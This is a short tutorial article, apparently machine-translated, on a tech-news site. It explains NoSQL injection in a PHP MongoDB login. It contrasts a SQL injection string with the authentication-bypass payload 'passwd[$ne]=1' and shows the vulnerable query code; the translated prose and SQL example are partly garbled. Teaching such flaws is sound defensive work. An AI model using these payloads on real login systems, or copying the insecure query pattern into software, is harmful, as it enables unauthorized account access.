Add to Favorites | Login | Register
Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

About us Contact us

How to use GET parameters to judge not strictly MongoDB injection

2025-01-17 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Database >

Share

Shulou(Shulou.com)05/31 Report--

This article to share with you is about how to use GET parameters to judge not strictly MongoDB injection, Xiaobian feel quite practical, so share to everyone to learn, I hope you can read this article after some gains, not much to say, follow Xiaobian to see it.

In the era of relational databases, SQL injection attack and defense has become a compulsory course for almost every Web developer, and many NoSQL supporters call NoSQL as well as NoSQL injection.

How to use GET parameter to judge whether MongoDB injection is not strict

Using SQL database to store user name and password system, our process of detecting user name and password may be like this:

mysql_query("SELECT*FROMuser

WHEREusername=".$_ GET['username']. ",

ANDpasswd=".$_ GET['passwd'])

The simplest username and password detection we can do with MongoDB might be something like this:

$collection->find(array(

"username"=>$_GET['username'],

"passwd"=>$_GET['passwd']

));

How to use GET parameter to judge whether MongoDB injection is not strict

In the most common SQL injection, we can construct a request like this:

login.php? username=admin&passwd=abcOR1-

This request would form an SQL statement like this:

SELECT*FROMuserWHEREusername=adminANDpasswd=abcOR1;

Successful injection!

Using the same approach, for the MongoDB query above, you can construct the following request:

login.php? username=admin&passwd[$ne]=1

This request forms a MongoDB query like this:

$collection->find(array(

"username"=>"admin",

"passwd"=>array("$ne"=>1)

));

Successful injection!

The above is how to use GET parameters to judge whether MongoDB injection is strictly carried out. Xiaobian believes that some knowledge points may be seen or used in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Tag Search: Parameters passwords users usernames success data databases more knowledge articles face query detection practical ordinary and at the same time work sessions developers required courses vpn macOS Linux MariaDB MySQL Docker Shulou Information Shulou Technology Shulou Tech Info OPPO Reno Redmi Xiaomi NVidia Microsoft Huawei Apple Shulou Technology macOS Apple MySQL NVidia Huawei Microsoft vpn OPPO Reno Docker Shulou Information Xiaomi Linux Redmi MariaDB Shulou Tech Info Shulou Technology macOS Apple MySQL NVidia Huawei Microsoft vpn OPPO Reno Docker Shulou Information Xiaomi Linux Redmi MariaDB Shulou Tech Info

Share To

Related

Database

More Database >

Latest Network Security More Network Security >

Latest Internet Technology More Internet Technology >

Latest Development More Development >

Latest Database More Database >

Latest Servers More Servers >

Latest Mobile Phone More Mobile Phone >

Latest Android Software More Android Software >

Latest Apple Software More Apple Software >

Latest Computer Software News More Computer Software News >

Latest IT Information More IT Information >

Wechat

About us Contact us Product review car news thenatureplanet

© 2024 shulou.com SLNews company. All rights reserved.

12
Report